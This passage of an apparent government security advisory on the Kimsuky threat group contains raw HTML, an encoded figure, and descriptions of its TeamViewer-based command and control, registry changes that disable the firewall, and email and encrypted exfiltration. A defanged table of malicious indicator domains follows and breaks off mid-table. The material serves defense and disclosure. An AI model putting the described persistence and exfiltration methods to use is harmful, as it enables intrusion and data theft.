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" style="width: 639px; height: 266px;" /></font></font></p> <p class="text-align-center" style="margin-top: 8px; margin-bottom: 13px;"><em>Figure 4: Python Script targeting MacOS</em> [57]</p> <h4 style="margin-top: 8px; margin-bottom: 8px;">Command and Control</h4> <p>Kimsuky has used a modified TeamViewer client, version 5.0.9104, for <em>Command and Control</em> [<a href="https://attack.mitre.org/versions/v7/tactics/TA0011/">TA0011</a>] (<em>Remote Access Software</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1219/">T1219</a>]). During the initial infection, the service “Remote Access Service” is created and adjusted to execute <code>C:\Windows\System32\vcmon.exe</code> at system startup (<em>Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1547/001/">T1547.001</a>]). Every time <code>vcmon.exe</code> is executed, it disables the firewall by zeroing out Registry values (<em>Impair Defenses: Disable or Modify System Firewall </em>[<a href="https://attack.mitre.org/versions/v7/techniques/T1562/004/">T1562.004</a>]). The program then modifies the TeamViewer Registry settings by changing the <code>TeamViewer</code> strings in TeamViewer components. The launcher then configures several Registry values, including <code>SecurityPasswordAES</code>, that control how the remote access tool will work. The <code>SecurityPasswordAES</code> Registry value represents a hash of the password used by a remote user to connect to TeamViewer Client (Use Alternate Authentication Material: Pass the Hash [<a href="https://attack.mitre.org/techniques/T1550/002/">T1550.002</a>]). This way, the attackers set a pre-shared authentication value to have access to the TeamViewer Client. The attacker will then execute the TeamViewer client <code>netsvcs.exe</code>.[<a href="https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/">58</a>]</p> <p>Kimsuky has been using a consistent format. In the URL used recently—<code>express[.]php?op=1</code>—there appears to be an option range from 1 to 3.[59]</p> <h4 style="margin-top: 8px; margin-bottom: 8px;">Exfiltration</h4> <p>Open-source reporting from cybersecurity companies describes two different methods Kimsuky has used to exfiltrate stolen data: via email or through an RC4 key generated as an MD5 hash or a randomly generated 117-bytes buffer (<em>Exfiltration </em>[<a href="https://attack.mitre.org/versions/v7/tactics/TA0010/">TA0010</a>]).</p> <p>There was no indication that the actor destroyed computers during the observed exfiltrations, suggesting Kimsuky’s intention is to steal information, not to disrupt computer networks. Kimsuky’s preferred method for sending or receiving exfiltrated information is through email, with their malware on the victim machine encrypting the data before sending it to a C2 server (<em>Archive Collected Data</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1560">T1560</a>]).&nbsp; Kimsuky also sets up auto-forward rules within a victim’s email account (E<em>mail Collection: Email Forwarding Rule</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1114/003/">T1114.003</a>]).</p> <p>Kimsuky also uses an RC4 key generated as an MD5 hash or a randomly generated 117-bytes buffer to exfiltrate stolen data. The data is sent RSA-encrypted (E<em>ncrypted Channel: Symmetric Cryptography</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1573/001">T1573.001</a>]). Kimsuky’s malware constructs an 1120-bit public key and uses it to encrypt the 117-bytes buffer. The resulting data file is saved in <code>C:\Program Files\Common Files\System\Ole DB\</code> (<em>Data Staged: Local Data Staging</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1074/001">T1074.001</a>]).[<a href="https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/">60</a>]</p> <h3>Mitigations</h3><h4 style="margin-top: 8px; margin-bottom: 8px;">Indicators of Compromise</h4> <p style="margin-top: 8px; margin-bottom: 8px;"><font color="#000000"><font size="3">Kimsuky has used the domains listed in table 1 to carry out its objectives:</font></font></p> <p style="margin-bottom: 8px;"><font color="#000000"><font size="3">For a downloadable copy of IOCs, see<a href="https://us-cert.cisa.gov/sites/default/files/publications/AA20-301A.stix.xml"> AA20-301A.stix</a>.</font></font></p> <p class="text-align-center" style="margin-top: 8px; margin-bottom: 13px;"><em>Table 1: Domains used by Kimsuky</em></p> <table style="border: medium none; width: 741px; border-collapse: collapse; margin-left: auto; margin-right: auto;"> <tbody> <tr height="px | %"> <td style="padding: 0in 7px; border: 1px solid black; border-image: none; width: 227px;" valign="top"> <p><code>login.bignaver[.]com</code></p> </td> <td style="border-width: 1px 1px 1px medium; border-style: solid solid solid none; border-color: black black black currentColor; padding: 0in 7px; width: 232px;" valign="top"> <p><code>nytimes.onekma[.]com</code></p> </td> <td style="border-width: 1px 1px 1px medium; border-style: solid solid solid none; border-color: black black black currentcolor; padding: 0in 7px; width: 244px;" valign="top"> <p><code>webuserinfo[.]com</code></p> </td> </tr> <tr height="px | %"> <td style="border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;" valign="top"> <p><code>member.navier.pe[.]hu</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;" valign="top"> <p><code>nid.naver.onektx[.]com</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;" valign="top"> <p style="margin-bottom: 8px;"><code>pro-navor[.]com</code></p> </td> </tr> <tr> <td style="border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;" valign="top"> <p style="margin-bottom: 8px;"><code>cloudnaver[.]com</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;" valign="top"> <p style="margin-bottom: 8px;"><code>read.tongilmoney[.]com</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;" valign="top"> <p style="margin-bottom: 8px;"><code>naver[.]pw</code></p> </td> </tr> <tr> <td style="border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;" valign="top"> <p style="margin-bottom: 8px;"><code>resetprofile[.]com</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;" valign="top"> <p style="margin-bottom: 8px;"><code>nid.naver.unicrefia[.]com</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;" valign="top"> <p style="margin-bottom: 8px;"><code>daurn[.]org</code></p> </td> </tr> <tr> <td style="border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;" valign="top"> <p style="margin-bottom: 8px;"><code>servicenidnaver[.]com</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;" valign="top"> <p style="margin-bottom: 8px;"><code>mail.unifsc[[.]com </code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;" valign="top"> <p style="margin-bottom: 8px;"><code>naver.com[.]de</code></p> </td> </tr> <tr> <td style="border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;" valign="top"> <p style="margin-bottom: 8px;"><code>account.daurn.pe[.]hu</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;" valign="top"> <p style="margin-bottom: 8px;"><code>member.daum.unikortv[.]com </code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;" valign="top"> <p style="margin-bottom: 8px;"><code>ns.onekorea[.]me</code></p> </td> </tr> <tr> <td style="border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;" valign="top"> <p style="margin-bottom: 8px;"><code>login.daum.unikortv[.]com<span style="color: black;"><font face="Consolas"><font size="3"><font style="background-color: rgb(191, 191, 191);"> </font></font></font></span></code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;" valign="top"> <p style="margin-bottom: 8px;"><code>securetymail[.]com</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;" valign="top"> <p style="margin-bottom: 8px;"><code>riaver[.]site</code></p> </td> </tr> <tr> <td style="border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;" valign="top"> <p style="margin-bottom: 8px;"><code>account.daum.unikortv[.]com<span style="color: black;"><font face="Consolas"><font size="3"><font style="background-color: rgb(191, 191, 191);"> </font></font></font></span></code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;" valign="top"> <p style="margin-bottom: 8px;"><code>help-navers[.]com</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;" valign="top"> <p style="margin-bottom: 8px;"><code>mailsnaver[.]com</code></p> </td> </tr> <tr> <td style="border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;" valign="top"> <p style="margin-bottom: 8px;"><code>daum.unikortv[.]com</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;" valign="top"> <p style="margin-bottom: 8px;"><code>beyondparallel.sslport[.]work</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;" valign="top"> <p style="margin-bottom: 8px;"><code>cloudmail[.]cloud</code></p> </td> </tr> <tr> <td style="border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;" valign="top"><code>member.daum.uniex[.]kr</code></td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;" valign="top"> <p style="margin-bottom: 8px;"><code>comment.poulsen[.]work</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;" valign="top"> <p style="margin-bottom: 8px;"><code>helpnaver[.]com</code></p> </td> </tr> <tr> <td style="border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;" valign="top"> <p style="margin-bottom: 8px;"><code>jonga[.]ml</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;" valign="top"> <p style="margin-bottom: 8px;"><code>impression.poulsen[.]work</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;" valign="top"> <p style="margin-bottom: 8px;"><code>view-naver[.]com</code></p> </td> </tr> <tr> <td style="border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;" valign="top"> <p style="margin-bottom: 8px;"><code>myaccounts.gmail.kr-infos[.]com</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;" valign="top"> <p style="margin-bottom: 8px;"><code>statement.poulsen[.]work</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;" valign="top"> <p style="margin-bottom: 8px;"><code>view-hanmail[.]net</code></p> </td> </tr> <tr> <td style="border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;" valign="top"> <p style="margin-bottom: 8px;"><code>naver.hol[.]es</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;" valign="top"> <p style="margin-bottom: 8px;"><code>demand.poulsen[.]work</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;" valign="top"> <p style="margin-bottom: 8px;"><code>login.daum.net-accounts[.]info</code></p> </td> </tr> <tr> <td style="border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;" valign="top"> <p style="margin-bottom: 8px;"><code>dept-dr.lab.hol[.]es</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;" valign="top"> <p style="margin-bottom: 8px;"><code>sankei.sslport[.]work</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;" valign="top"> <p style="margin-bottom: 8px;"><code>read-hanmail[.]net</code></p> </td> </tr> <tr> <td style="border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;" valign="top"> <p style="margin-bottom: 8px;"><code>Daurn.pe[.]hu</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;" valign="top"> <p style="margin-bottom: 8px;"><code>sts.desk-top[.]work</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;" valign="top"> <p style="margin-bottom: 8px;"><code>net.tm[.]ro</code></p> </td> </tr> <tr> <td style="border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;" valign="top"> <p style="margin-bottom: 8px;"><code>Bigfile.pe[.]hu</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;" valign="top"> <p style="margin-bottom: 8px;"><code>hogy.desk-top[.]work</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;" valign="top"> <p style="margin-bottom: 8px;"><code>daum.net[.]pl</code></p> </td> </tr> <tr> <td style="border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;" valign="top"> <p style="margin-bottom: 8px;"><code>Cdaum.pe[.]hu</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;" valign="top"> <p style="margin-bottom: 8px;"><code>kooo[.]gq </code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;" valign="top"> <p style="margin-bottom: 8px;"><code>usernaver[.]com</code></p> </td> </tr> <tr> <td style="border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;" valign="top"> <p style="margin-bottom: 8px;"><code>eastsea.or[.]kr</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;" valign="top"> <p style="margin-bottom: 8px;"><code>tiosuaking[.]com</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;" valign="top"> <p style="margin-bottom: 8px;"><code>naver.com[.]ec</code></p> </td> </tr> <tr> <td style="border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;" valign="top"> <p style="margin-bottom: 8px;"><code>myaccount.nkaac[.]net</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;" valign="top"> <p style="margin-bottom: 8px;"><code>help.unikoreas[.]kr</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;" valign="top"> <p style="margin-bottom: 8px;"><code>naver.com[.]mx</code></p> </td> </tr> <tr> <td style="border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;" valign="top"> <p style="margin-bottom: 8px;"><code>naver.koreagov[.]com</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;" valign="top"> <p style="margin-bottom: 8px;"><code>resultview[.]com</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;" valign="top"> <p style="margin-bottom: 8px;"><code>naver.com[.]se</code></p> </td> </tr> <tr> <td style="border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;" valign="top"> <p style="margin-bottom: 8px;"><code>naver.onegov[.]com</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;" valign="top"> <p style="margin-bottom: 8px;"><code>account.daum.unikftc[.]kr</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;" valign="top"> <p style="margin-bottom: 8px;"><code>naver.com[.]cm</code></p> </td> </tr> <tr> <td style="border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;" valign="top"> <p style="margin-bottom: 8px;"><code>member-authorize[.]com</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;" valign="top"> <p style="margin-bottom: 8px;"><code>ww-naver[.]com</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;" valign="top"> <p style="margin-bottom: 8px;"><code>nid.naver.com[.]se</code></p> </td> </tr> <tr> <td style="border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;" valign="top"> <p style="margin-bottom: 8px;"><code>naver.unibok[.]kr</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;" valign="top"> <p style="margin-bottom: 8px;"><code>vilene.desk-top[.]work</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;" valign="top"> <p style="margin-bottom: 8px;"><code>csnaver[.]com</code></p> </td> </tr> <tr> <td style="border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;" valign="top"> <p style="margin-bottom: 8px;"><code>nid.naver.unibok[.]kr</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;" valign="top"> <p style="margin-bottom: 8px;"><code>amberalexander.ghtdev[.]com</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;" valign="top"> <p><code>nidnaver[.]email</code></p> </td> </tr> <tr> <td style="border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;" valign="top"> <p style="margin-bottom: 8px;"><code>read-naver[.]com</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;" valign="top"> <p style="margin-bottom: 8px;"><code>nidnaver[.]net</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;" valign="top"> <p style="margin-bottom: 8px;"><code>cooper[.]center</code></p> </td> </tr> <tr> <td style="border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;" valign="top"> <p style="margin-bottom: 8px;"><code>dubai-1[.]com</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;" valign="top"> <p style="margin-bottom: 8px;"><code>coinone.co[.]in</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;" valign="top"> <p style="margin-bottom: 8px;"><code>nidlogin.naver.corper[.]be</code></p> </td> </tr> <tr> <td style="border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;" valign="top"> <p style="margin-bottom: 8px;"><code>amberalexander.ghtdev[.]com</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;" valign="top"> <p style="margin-bottom: 8px;"><code>naver.com[.]pl</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;" valign="top"> <p style="margin-bottom: 8px;"><code>nid.naver.corper[.]be</code></p> </td> </tr> <tr> <td style="border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;" valign="top"> <p style="margin-bottom: 8px;"><code>gloole[.]net</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;" valign="top"> <p style="margin-bottom: 8px;"><code>naver[.]cx</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;" valign="top"> <p style="margin-bottom: 8px;"><code>naverdns[.]co</code></p> </td> </tr> <tr> <td style="border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;" valign="top"> <p style="margin-bottom: 8px;"><code>smtper[.]org</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;" valign="top"> <p style="margin-bottom: 8px;"><code>smtper[.]cz</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;" valign="top"> <p style="margin-bottom: 8px;"><code>naver.co[.]in</code></p> </td> </tr> <tr> <td style="border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;" valign="top"> <p style="margin-bottom: 8px;"><code>login.daum.kcrct[.]ml</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;" valign="top"> <p style="margin-bottom: 8px;"><code>myetherwallet.com[.]mx</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;" valign="top"> <p style="margin-bottom: 8px;"><code>downloadman06[.]com</code></p> </td> </tr> <tr> <td style="border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;" valign="top"> <p style="margin-bottom: 8px;"><code>login.outlook.kcrct[.]ml</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;" valign="top"> <p style="margin-bottom: 8px;"><code>myetherwallet.co[.]in </code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;" valign="top"> <p style="margin-bottom: 8px;"><code>loadmanager07[.]com</code></p> </td> </tr> <tr> <td style="border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;" valign="top"> <p style="margin-bottom: 8px;"><code>top.naver.onekda[.]com</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;" valign="top"> <p style="margin-bottom: 8px;"><code>com-download[.]work</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;" valign="top"> <p style="margin-bottom: 8px;"><code>com-option[.]work</code></p> </td> </tr> <tr> <td style="border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;" valign="top"> <p style="margin-bottom: 8px;"><code>com-sslnet[.]work</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid 